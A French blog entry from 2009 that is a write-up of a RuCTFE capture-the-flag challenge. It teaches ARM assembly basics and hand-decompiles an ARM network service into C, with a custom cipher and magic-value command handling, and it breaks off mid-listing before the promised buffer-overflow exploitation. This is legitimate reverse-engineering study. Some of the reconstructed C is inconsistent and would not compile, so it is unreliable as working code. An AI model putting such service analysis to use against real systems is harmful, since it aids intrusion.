Baboon's Blog - Mot-clé - RuCTFE
2016-11-05T16:24:49+00:00
Baboon
urn:md5:f26b67ff836d93885e04843b0cae9de4
Dotclear
l'ARM c'est rigolo
urn:md5:c4c9eed46b51fe990a4dd5d9d2ab2ffa
2009-11-08T18:35:00+00:00
2009-11-17T21:05:12+00:00
Baboon
ARMBuffer OverflowRuCTFE
<p>Hop hop hop</p>
<p>Ca ne rigole plus l'avalanche de posts arrive <img src="/themes/default/smilies/wink.png" alt=";)" class="smiley" /></p>
<p>Samedi soir c'était CTF time avec le RuCTFE, je ne parlerai pas trop de ce ctf étant donné que je n'ai absolument RIEN compris de ce qu'il fallait faire (à part une sombre histoire de <a href="http://ructf.org/e/2009/videos.html" hreflang="en">danses russes</a> et de <a href="http://scoreboard.ructf.org/" hreflang="en">services</a> à maintenir en route ...) bref, j'ai quand même finit par trouver mon créneau dans la team nibbles (20ème sur 43 s'pas glorieux mais bon) et je me suis attelé à l'étude d'un serveur arm qui tournait dans un émulateur androïd.</p>
<p>Nous allons donc voir dans ce post les rudiments de l'ARM, comment le reverser les doigts de pieds dans le nez en le décompilant à la main, comment on pouvait valider l'épreuve et enfin comment une exploitation de buffer overflow peut être faite même si ce n'était pas l'objet du challenge.</p> <p>L'ARM c'est tout mignon tout plein, c'est censé être simple étant donné que c'est une architecture RISC (reduced instruction set computer) mais quand on se trouve devant des instructions comme <em>STMFD SP!, {R4-R8,R10,LR}</em> ou <em>SUB R0, R0, R3,LSL#4</em> ou encore devant un listing qui ressemble à ca :</p>
<pre>
LDR R3, =0xB896
MOV R1, R0,LSR#16
MUL R12, R1, R3
EOR R12, R12, R0
MOV R12, R12,LSL#16
MOV R3, R12,LSR#16
MOV R2, R3,LSL#13
SUB R2, R2, R3,LSL#2
RSB R2, R3, R2
MOV R2, R2,LSL#3
ADD R2, R2, R3
EOR R2, R2, R1
MOV R2, R2,LSL#16
MOV R3, R2,LSR#16
MOV R0, R3,LSL#9
SUB R0, R0, R3,LSL#7
RSB R0, R3, R0
MOV R1, R0,LSL#4
ADD R0, R0, R1
EOR R0, R0, R12,LSR#16
LDR R1, =0x4520
MOV R0, R0,LSL#16
MOV R0, R0,LSR#16
MUL R3, R0, R1
EOR R3, R3, R2,LSR#16
ORR R0, R0, R3,LSL#16
BX LR
</pre>
<p>eh bien on prend peur.</p>
<p>Pourtant une fois qu'on s'est familiarisé avec le format des instructions ARM on se rend compte qu'elles sont très facilement transcriptable (je doute de l'existence de ce mot mais bon) en C.</p>
<p>Le format général des instructions arm est la suivante :
Instruction destination , source1, [source2, [LSL/LSR #n]]</p>
<p>LSL et LSR servant à décaler source2 de n bit vers la gauche (L) ou vers la droite (R).</p>
<p>ainsi SUB R0, R0, R3,LSL#4 est équivalent à r0 = r0 - (r3 << 4)</p>
<p>Il suffit alors de se familiariser avec les instruction ARM telles que :</p>
<ul>
<li>RSB : reverse substract, au lieu de faire destination = source1 - source2, elle effectue un destination = source2 - source1</li>
<li>EOR : 'équivalent de l'instruction XOR en x86</li>
<li>STMFD : push une série de registres, le '!' servant à mettre à jour le registre de pile</li>
<li>LDMFD : l'instruction inverse</li>
<li>BL : équivalent du call</li>
<li>BCC : équivalent des jcc en x86</li>
<li>LDR : load register, affecte à destination le DWORD pointé par source</li>
<li>STR : store register, affecte au DWORD pointé par la source la valeur de source</li>
</ul>
<p>enfin il faut savoir que les fonctions ARM n'utilisent que très peu la pile ou uniquement pour stocker des tableaux, le compilateur a en effet 13 registres généraux pour effectuer ses calculs, stocker ses variables ce qui rend l'analyse de code ARM sous IDA assez pénible, impossible de faire comme en x86 et renommer tout plein de variables. De plus l'adresse de retour des fonction n'est théoriquement pas situé sur la pile mais dans un registre : r14 ou LR sous IDA et le retour d'une fonction ne se fait pas avec un retn mais en plaçant directement la valeur de LR dans PC (ou r15, l'équivalent de eip en ARM) soit à l'aide de LDMFD si LR a été enregistré dans la pile (couple <em>STMFD SP!, {R4-R12,LR}</em> [...] <em>LDMFD SP!, {R4-R12,PC}</em>, équivalent de notre <em>push ebx | push edi | push esi</em> [...] <em>pop esi | pop edi | pop ebx | retn</em>) soit à l'aide de l'instruction <em>BX LR</em>.</p>
<p>Passons maintenant à l'analyse du programme :</p>
<p>Les APIs ne sont pas appelées directement mais via l'exécution de la suite d'instruction suivante :</p>
<pre>
ADR R12, X
ADD R12, R12, #0x1000
X:
LDR PC, [R12,#X2]!
</pre>
<p>Ne me demandez pas pourquoi, je ne sais pas. Pour retrouver les APIs appelées il suffit donc de regarder l'adresse se situant en X+0x1000+X2, une fois fait cela nous voyons directement quelles APIs sont appelées</p>
<p>Nous trouvons donc rapidement que la routine exécutée à chaque connexion à l'aide d'un pthread_create est située en 0x88C4. Maintenant que nous savon quoi étudier nous allons retranscrire le code en C, petite précision avant :</p>
<p>la suite d'instructions</p>
<pre>
MOV R3, R4,LSL#6
SUB R5, R3, R4,LSL#4
</pre>
<p>correspond au code C suivant : r5 = r4*0x30, c'est une optimisation faite par le compilateur, 2 décalages et une soustraction étant moins couteux qu'une multiplication, on a donc :</p>
<p>r5 = (r4 << 6) - (r4 << 4) <=> r5 = r4*2^6 - r4*2^4 <=> r5 = r4 * (2^6 - 2^4) <=> r5 = r4*0x30</p>
<p>passons au code retranscrit en C :</p>
<pre class="c"><ol><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">DWORD c1<span style="color: #66cc66;">(</span>DWORD d<span style="color: #66cc66;">)</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color: #66cc66;">{</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> DWORD a <span style="color: #66cc66;">=</span> d >> <span style="color: #cc66cc;">16</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> DWORD b <span style="color: #66cc66;">=</span> <span style="color: #66cc66;">(</span><span style="color: #66cc66;">(</span>a <span style="color: #66cc66;">-</span> 0x399A<span style="color: #66cc66;">)</span> <span style="color: #66cc66;">^</span> d<span style="color: #66cc66;">)</span> <span style="color: #66cc66;">&</span> 0xFFFF;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> DWORD c <span style="color: #66cc66;">=</span> b <span style="color: #66cc66;">-</span> 0x459A;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> DWORD e;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> a <span style="color: #66cc66;">=</span> <span style="color: #66cc66;">(</span>a <span style="color: #66cc66;">^</span> c<span style="color: #66cc66;">)</span> <span style="color: #66cc66;">&</span> 0xFFFF;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> e <span style="color: #66cc66;">=</span> <span style="color: #66cc66;">(</span><span style="color: #66cc66;">(</span>a <span style="color: #66cc66;">+</span> 0x70FB<span style="color: #66cc66;">)</span> <span style="color: #66cc66;">^</span> b<span style="color: #66cc66;">)</span> <span style="color: #66cc66;">&</span> 0xFFFF;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> c <span style="color: #66cc66;">=</span> <span style="color: #66cc66;">(</span>e <span style="color: #66cc66;">-</span> 0x2520<span style="color: #66cc66;">)</span> <span style="color: #66cc66;">^</span> a;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">return</span> e | <span style="color: #66cc66;">(</span>c << <span style="color: #cc66cc;">16</span><span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color: #66cc66;">}</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">DWORD c2<span style="color: #66cc66;">(</span>DWORD h<span style="color: #66cc66;">)</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color: #66cc66;">{</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> DWORD r3,r1,r12,r2,r0;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> r1 <span style="color: #66cc66;">=</span> <span style="color: #66cc66;">(</span>h >> <span style="color: #cc66cc;">16</span><span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> r12 <span style="color: #66cc66;">=</span> <span style="color: #66cc66;">(</span><span style="color: #66cc66;">(</span>0xB896 <span style="color: #66cc66;">*</span> r1<span style="color: #66cc66;">)</span> <span style="color: #66cc66;">^</span> h<span style="color: #66cc66;">)</span> << <span style="color: #cc66cc;">16</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> r3 <span style="color: #66cc66;">=</span> r12 >> <span style="color: #cc66cc;">16</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> r2 <span style="color: #66cc66;">=</span> <span style="color: #66cc66;">(</span><span style="color: #66cc66;">(</span><span style="color: #66cc66;">(</span><span style="color: #66cc66;">(</span><span style="color: #66cc66;">(</span>r3 << <span style="color: #cc66cc;">13</span><span style="color: #66cc66;">)</span> <span style="color: #66cc66;">-</span> <span style="color: #66cc66;">(</span>r3 << <span style="color: #cc66cc;">2</span><span style="color: #66cc66;">)</span> <span style="color: #66cc66;">-</span> r3<span style="color: #66cc66;">)</span> << <span style="color: #cc66cc;">3</span><span style="color: #66cc66;">)</span> <span style="color: #66cc66;">+</span> r3<span style="color: #66cc66;">)</span> <span style="color: #66cc66;">^</span> r1<span style="color: #66cc66;">)</span> << <span style="color: #cc66cc;">16</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> r3 <span style="color: #66cc66;">=</span> r2 >> <span style="color: #cc66cc;">16</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> r0 <span style="color: #66cc66;">=</span> <span style="color: #66cc66;">(</span><span style="color: #66cc66;">(</span>r3 << <span style="color: #cc66cc;">9</span><span style="color: #66cc66;">)</span> <span style="color: #66cc66;">-</span> <span style="color: #66cc66;">(</span>r3 << <span style="color: #cc66cc;">7</span><span style="color: #66cc66;">)</span><span style="color: #66cc66;">)</span> <span style="color: #66cc66;">-</span> r3;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> r1 <span style="color: #66cc66;">=</span> r0 << <span style="color: #cc66cc;">4</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> r0 <span style="color: #66cc66;">=</span> <span style="color: #66cc66;">(</span><span style="color: #66cc66;">(</span>r1 <span style="color: #66cc66;">+</span> r0<span style="color: #66cc66;">)</span> <span style="color: #66cc66;">^</span> <span style="color: #66cc66;">(</span>r12 >> <span style="color: #cc66cc;">16</span><span style="color: #66cc66;">)</span><span style="color: #66cc66;">)</span> <span style="color: #66cc66;">&</span> 0xFFFF;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> r3 <span style="color: #66cc66;">=</span> <span style="color: #66cc66;">(</span>r0<span style="color: #66cc66;">*</span><span style="color: #66cc66;">(</span>0x4520<span style="color: #66cc66;">)</span><span style="color: #66cc66;">)</span> <span style="color: #66cc66;">^</span> <span style="color: #66cc66;">(</span>r2 >> <span style="color: #cc66cc;">16</span><span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">return</span> r0 | <span style="color: #66cc66;">(</span>r3 << <span style="color: #cc66cc;">16</span><span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color: #66cc66;">}</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color: #993333;">void</span> crypt<span style="color: #66cc66;">(</span>PDWORD buff, <span style="color: #993333;">int</span> size, DWORD <span style="color: #66cc66;">(</span><span style="color: #66cc66;">*</span>fun<span style="color: #66cc66;">)</span><span style="color: #66cc66;">(</span>DWORD<span style="color: #66cc66;">)</span><span style="color: #66cc66;">)</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color: #66cc66;">{</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #993333;">int</span> i;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">for</span> <span style="color: #66cc66;">(</span>i <span style="color: #66cc66;">=</span> <span style="color: #cc66cc;">0</span>; i < size<span style="color: #66cc66;">/</span><span style="color: #cc66cc;">4</span> ; i<span style="color: #66cc66;">++</span><span style="color: #66cc66;">)</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">{</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> buff<span style="color: #66cc66;">[</span>i<span style="color: #66cc66;">]</span> <span style="color: #66cc66;">=</span> fun<span style="color: #66cc66;">(</span>buff<span style="color: #66cc66;">[</span>i<span style="color: #66cc66;">]</span><span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">}</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color: #66cc66;">}</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color: #993333;">void</span> serv<span style="color: #66cc66;">(</span><span style="color: #993333;">int</span><span style="color: #66cc66;">*</span> p_socket<span style="color: #66cc66;">)</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color: #66cc66;">{</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #993333;">int</span> i,n;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #993333;">int</span> socket <span style="color: #66cc66;">=</span> <span style="color: #66cc66;">*</span>p_socket;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #993333;">char</span> buff<span style="color: #66cc66;">[</span>0x34<span style="color: #66cc66;">]</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #993333;">char</span> buff2<span style="color: #66cc66;">[</span>0x20<span style="color: #66cc66;">]</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">for</span> <span style="color: #66cc66;">(</span>i <span style="color: #66cc66;">=</span> 0x34; i > <span style="color: #cc66cc;">0</span> ; i<span style="color: #66cc66;">-=</span> n<span style="color: #66cc66;">)</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">{</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">if</span> <span style="color: #66cc66;">(</span><span style="color: #66cc66;">!</span><span style="color: #66cc66;">(</span>n <span style="color: #66cc66;">=</span> recv<span style="color: #66cc66;">(</span>socket,<span style="color: #66cc66;">&</span>buff<span style="color: #66cc66;">[</span>0x34<span style="color: #66cc66;">-</span>i<span style="color: #66cc66;">]</span>,i,0x100<span style="color: #66cc66;">)</span><span style="color: #66cc66;">)</span><span style="color: #66cc66;">)</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">{</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> close<span style="color: #66cc66;">(</span>socket<span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> free<span style="color: #66cc66;">(</span>p_socket<span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">return</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">}</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">}</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> crypt<span style="color: #66cc66;">(</span><span style="color: #66cc66;">(</span>PDWORD<span style="color: #66cc66;">)</span>buff,0x34,c1<span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">switch</span><span style="color: #66cc66;">(</span><span style="color: #66cc66;">*</span><span style="color: #66cc66;">(</span><span style="color: #66cc66;">(</span>PDWORD<span style="color: #66cc66;">)</span>buff<span style="color: #66cc66;">)</span><span style="color: #66cc66;">)</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">{</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">case</span> 0xCAFEBABE <span style="color: #66cc66;">:</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> memcpy<span style="color: #66cc66;">(</span><span style="color: #66cc66;">(</span><span style="color: #66cc66;">*</span>nbMess<span style="color: #66cc66;">)</span><span style="color: #66cc66;">*</span>0x30<span style="color: #66cc66;">+</span>magic,buff<span style="color: #cc66cc;">+4</span>,0x30<span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> send<span style="color: #66cc66;">(</span>socket,MagicString<span style="color: #66cc66;">+</span><span style="color: #66cc66;">(</span><span style="color: #66cc66;">*</span>nearIAT<span style="color: #66cc66;">)</span><span style="color: #66cc66;">*</span>0x30,0x30,<span style="color: #cc66cc;">0</span><span style="color: #66cc66;">)</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">*</span>nearIAT <span style="color: #66cc66;">=</span> <span style="color: #66cc66;">(</span><span style="color: #66cc66;">*</span>nbMess <span style="color: #66cc66;">+</span> <span style="color: #cc66cc;">1</span><span style="color: #66cc66;">)</span> <span style="color: #66cc66;">&</span> 0x7F;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #000000; font-weight: bold;">break</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">case</span> 0xBABECAFE <span style="color: #66cc66;">:</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">for</span> <span style="color: #66cc66;">(</span>i <span style="color: #66cc66;">=</span> <span style="color: #cc66cc;">0</span>; i <span style="color: #66cc66;">!=</span> 0x80; i<span style="color: #66cc66;">++</span><span style="color: #66cc66;">)</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">{</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">if</span> <span style="color: #66cc66;">(</span><span style="color: #66cc66;">!</span> memcmp<span style="color: #66cc66;">(</span>magic<span style="color: #66cc66;">+</span>i<span style="color: #66cc66;">*</span>0x30,buff<span style="color: #cc66cc;">+4</span>,0x10<span style="color: #66cc66;">)</span><span style="color: #66cc66;">)</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">{</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> memcpy<span style="color: #66cc66;">(</span>buff2,magic<span style="color: #66cc66;">+</span>i<span style="color: #66cc66;">*</span>0x30<span style="color: #66cc66;">+</span>0x10,0x20<span style="color: #66cc66;">)</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #000000; font-weight: bold;">break</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">}</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">}</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">if</span> <span style="color: #66cc66;">(</span>i <span style="color: #66cc66;">==</span> 0x80<span style="color: #66cc66;">)</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">{</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> memcpy<span style="color: #66cc66;">(</span>buff2,magic<span style="color: #66cc66;">+</span>0x10<span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #000000; font-weight: bold;">break</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">}</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> crypt<span style="color: #66cc66;">(</span><span style="color: #66cc66;">(</span>PDWORD<span style="color: #66cc66;">)</span>buff2,0x20,c2<span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> send<span style="color: #66cc66;">(</span>socket,buff2,0x20,<span style="color: #cc66cc;">0</span><span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #000000; font-weight: bold;">break</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">case</span> 0xBABEBABE <span style="color: #66cc66;">:</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> memcpy<span style="color: #66cc66;">(</span>buff2,magic,0x10<span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> crypt<span style="color: #66cc66;">(</span><span style="color: #66cc66;">(</span>PDWORD<span style="color: #66cc66;">)</span>buff2,0x10,c2<span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> send<span style="color: #66cc66;">(</span>socket,buff2,0x10,<span style="color: #cc66cc;">0</span><span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 